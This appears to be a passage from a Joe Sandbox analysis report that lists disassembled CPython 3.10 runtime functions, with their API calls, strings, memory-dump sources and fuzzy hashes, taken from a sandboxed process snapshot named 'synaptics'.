                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$String$Object
                                                                                                                                                                                                      • String ID: Pntl$__traceback__ may not be deleted$__traceback__ must be a traceback or None
                                                                                                                                                                                                      • API String ID: 2901738166-1101660714
                                                                                                                                                                                                      • Opcode ID: a6bc0bc169e9aef5ffe44cdca6cad3736811950dc6e62d92ea377a4f32dc4d31
                                                                                                                                                                                                      • Instruction ID: 5e1f9a8732a92fa173a49672ccd38e532ee903b5bd3aad32263a16f0bb87deee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6bc0bc169e9aef5ffe44cdca6cad3736811950dc6e62d92ea377a4f32dc4d31
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04016B72A041045B8B24DF6DAD05C91B359AF9623E71483A8EC3C8BFE0EA21DC1087E2
                                                                                                                                                                                                      Function 6C4D48C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • a bytes-like object is required, not '%.100s', xrefs: 6C4D4B42
                                                                                                                                                                                                      • decoding to str: need a bytes-like object, %.80s found, xrefs: 6C4D4B5B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: a bytes-like object is required, not '%.100s'$decoding to str: need a bytes-like object, %.80s found
                                                                                                                                                                                                      • API String ID: 0-3982127523
                                                                                                                                                                                                      • Opcode ID: 2a63368db483da004183a5b54a8ac5ee59833d38fa9ae7fcb217238deb6c4728
                                                                                                                                                                                                      • Instruction ID: 3bf243b5c8b0a5763aee7ceed4b05221700174e0eb28c21395cd062bbc214f33
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a63368db483da004183a5b54a8ac5ee59833d38fa9ae7fcb217238deb6c4728
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71112B36301200AFDB04EF16DC61FAB7BA9EF4075AF02012CFD1487A60D721E814C791
                                                                                                                                                                                                      Function 6C473A30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,000005EA,00000000,?,6C551BF0,?,00000000,?,?,?,00000000), ref: 6C473A5E
                                                                                                                                                                                                      • PyObject_Hash.PYTHON310(6C551BF0,?,00000000,?,6C551BF0,?,00000000,?,?,?,00000000,?,?,?,6C4DA72B,?), ref: 6C473A81
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C473A4D
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C473A52
                                                                                                                                                                                                      • @Btl, xrefs: 6C473A6F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatHashObject_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$@Btl$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 896634218-1953751630
                                                                                                                                                                                                      • Opcode ID: a1dda0a0a9fd9afb9885cf78f6bcfcbd0ae47025d31ea77dfa9b2c622dd5d8c8
                                                                                                                                                                                                      • Instruction ID: a03426a8072ea0b0d94aed781310687f3e68c722cd2fff8ba2a190e20dd0aafe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1dda0a0a9fd9afb9885cf78f6bcfcbd0ae47025d31ea77dfa9b2c622dd5d8c8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F01B532300504ABDB10DAA9DC42EDA73B9EF81336B048625F92D87A50D730E95197E1
                                                                                                                                                                                                      Function 6C57BDB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(_config_init,_config_init,?,?,6C57BE32,?,?), ref: 6C57BDB8
                                                                                                                                                                                                        • Part of subcall function 6C4D2B20: _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long,?,?,?,6C44F059,?), ref: 6C4D2B5A
                                                                                                                                                                                                      • PyDict_GetItemWithError.PYTHON310(?,00000000,?), ref: 6C57BDCC
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(missing config key: %s,_config_init), ref: 6C57BE02
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_String$Dict_ErrorFormatFromItemUnicode_With
                                                                                                                                                                                                      • String ID: _config_init$missing config key: %s
                                                                                                                                                                                                      • API String ID: 3695362699-350919631
                                                                                                                                                                                                      • Opcode ID: b3aa0ef02134d607f0e33e9ad36bd130cbf10962e5817d1d36bc43c046704941
                                                                                                                                                                                                      • Instruction ID: a0af45aefc7789e42e79a2da6d0c5da0da4c0d93640b6b6832f54113aa0bb2f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3aa0ef02134d607f0e33e9ad36bd130cbf10962e5817d1d36bc43c046704941
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6F0F6727401145BD321A56AAD80E8723E9CBC1279B190635E948C7B61EA659C9583F1
                                                                                                                                                                                                      Function 6C471F50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,00000080,%d %ss * %zd bytes each,?,free PyDictObject,00000020), ref: 6C471F8F
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,00000080,%48s ,?,?,00000080,%d %ss * %zd bytes each,?,free PyDictObject,00000020), ref: 6C471FAC
                                                                                                                                                                                                        • Part of subcall function 6C583E20: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,?,6C4B751D,?,000003E8,Cannot create a consistent method resolutionorder (MRO) for bases,00000000,00000000), ref: 6C583E5F
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 6C4A834C
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000020,?), ref: 6C4A8379
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000003D,?), ref: 6C4A8388
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 6C4A83F3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: S_snprintffputcfputs$__stdio_common_vsprintf
                                                                                                                                                                                                      • String ID: %48s $%d %ss * %zd bytes each$free PyDictObject
                                                                                                                                                                                                      • API String ID: 1946324925-3986588150
                                                                                                                                                                                                      • Opcode ID: 2e4d4bf8c0b2cfda82c8e3d2d28364917d28f30790c87c230c3237d2f5c76918
                                                                                                                                                                                                      • Instruction ID: dc76ef67fdabf246f5a834e553745770ecd7fa789227afe4029f022710daf3e4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e4d4bf8c0b2cfda82c8e3d2d28364917d28f30790c87c230c3237d2f5c76918
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7016231A0112CABCA10DA54CD45FDAB3B9EB49240F0444A5F648AB680DB70AE498B95
                                                                                                                                                                                                      Function 6C485AD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,00000080,%d %ss * %zd bytes each,?,free PyFrameObject,00000138), ref: 6C485B12
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,00000080,%48s ,?,?,00000080,%d %ss * %zd bytes each,?,free PyFrameObject,00000138), ref: 6C485B2F
                                                                                                                                                                                                        • Part of subcall function 6C583E20: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,?,6C4B751D,?,000003E8,Cannot create a consistent method resolutionorder (MRO) for bases,00000000,00000000), ref: 6C583E5F
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 6C4A834C
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000020,?), ref: 6C4A8379
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000003D,?), ref: 6C4A8388
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 6C4A83F3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: S_snprintffputcfputs$__stdio_common_vsprintf
                                                                                                                                                                                                      • String ID: %48s $%d %ss * %zd bytes each$free PyFrameObject
                                                                                                                                                                                                      • API String ID: 1946324925-2728100305
                                                                                                                                                                                                      • Opcode ID: 6701ac68dd96762ee8e641ab338be5f4b2b0491367bf91e22ccd84b8c2e58356
                                                                                                                                                                                                      • Instruction ID: 545ca5103c9fac379d4362ffb5982bb0495d3a1ea0fa163e4f955ab6840c2a91
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6701ac68dd96762ee8e641ab338be5f4b2b0491367bf91e22ccd84b8c2e58356
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5018671A0121CABCF10DB64CD45EDAB7FDEB95340F0044A5F64897680DB70AE4ACB95
                                                                                                                                                                                                      Function 6C483460 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,00000080,%d %ss * %zd bytes each,?,free PyFloatObject,00000010), ref: 6C48349F
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,00000080,%48s ,?,?,00000080,%d %ss * %zd bytes each,?,free PyFloatObject,00000010), ref: 6C4834BC
                                                                                                                                                                                                        • Part of subcall function 6C583E20: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,?,6C4B751D,?,000003E8,Cannot create a consistent method resolutionorder (MRO) for bases,00000000,00000000), ref: 6C583E5F
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 6C4A834C
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000020,?), ref: 6C4A8379
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000003D,?), ref: 6C4A8388
                                                                                                                                                                                                        • Part of subcall function 6C4A8330: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 6C4A83F3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: S_snprintffputcfputs$__stdio_common_vsprintf
                                                                                                                                                                                                      • String ID: %48s $%d %ss * %zd bytes each$free PyFloatObject
                                                                                                                                                                                                      • API String ID: 1946324925-3308808493
                                                                                                                                                                                                      • Opcode ID: afd7dcd3d89498b079130c2f03726a3eff835a3ce1c3a636ae797eeb18089868
                                                                                                                                                                                                      • Instruction ID: 9af740ec31cf6942c29bd16e0bd0e77881b1f800ad4f280ca2b2c4c115bfae79
                                                                                                                                                                                                      • Opcode Fuzzy Hash: afd7dcd3d89498b079130c2f03726a3eff835a3ce1c3a636ae797eeb18089868
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC018671A0112CABCE20DB64CD41FDEB3BDEB45250F0045A5F648E7680DB70BE49CBA5
                                                                                                                                                                                                      Function 6C4B1FF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C6A4,?,?,6C4B2065,?,?,?,?,6C480854,6C751978), ref: 6C4B1FF5
                                                                                                                                                                                                      • PyDict_GetItemWithError.PYTHON310(009422F8,00000000,6C751978), ref: 6C4B2011
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(Missed attribute '%U' of type %s,00000000,6C6FB0BC,?,6C751978), ref: 6C4B2039
                                                                                                                                                                                                      • PyLong_AsSsize_t.PYTHON310(00000000,?,6C751978), ref: 6C4B2042
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Missed attribute '%U' of type %s, xrefs: 6C4B202E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dict_Err_ErrorFormatFromItemLong_Ssize_tUnicode_With
                                                                                                                                                                                                      • String ID: Missed attribute '%U' of type %s
                                                                                                                                                                                                      • API String ID: 2873520760-2644483622
                                                                                                                                                                                                      • Opcode ID: 48760bfd448f9be5b67b0d8a23bbe93993105aea250fe731855a421fcb8bc928
                                                                                                                                                                                                      • Instruction ID: 022a0c5b09d46803c446c46033e463388212a8738720349cc355f96dd2fb088a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48760bfd448f9be5b67b0d8a23bbe93993105aea250fe731855a421fcb8bc928
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0277260101067CB3199256C45EC73A358FC12BFB084138FD185AB62EF269865D3F1
                                                                                                                                                                                                      Function 6C4A2C10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_CheckRecursiveCall.PYTHON310(?, in comparison,00000000,00000000,?,?,6C452282,00000000,00000000,00000002), ref: 6C4A2C4F
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\object.c,000002E0), ref: 6C4A2DC7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • in comparison, xrefs: 6C4A2C49
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4A2DBB
                                                                                                                                                                                                      • D:\a\1\s\Objects\object.c, xrefs: 6C4A2DB6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallCheckErr_FormatRecursive
                                                                                                                                                                                                      • String ID: in comparison$%s:%d: bad argument to internal function$D:\a\1\s\Objects\object.c
                                                                                                                                                                                                      • API String ID: 2810202801-1172236324
                                                                                                                                                                                                      • Opcode ID: ae8d3d0b87cc1c1c9c192be8d734e2a76fb3631004e038276a23f3bdb74ed5be
                                                                                                                                                                                                      • Instruction ID: e1e366de3de4f2c9b0a30c6b253b00504f39a1d1b0a5ba821562d6f4a2a727da
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae8d3d0b87cc1c1c9c192be8d734e2a76fb3631004e038276a23f3bdb74ed5be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFF09072200618EBDB20DEA6DD85E8673B9FF9631AB004919E51957F06DB30B8468BE1
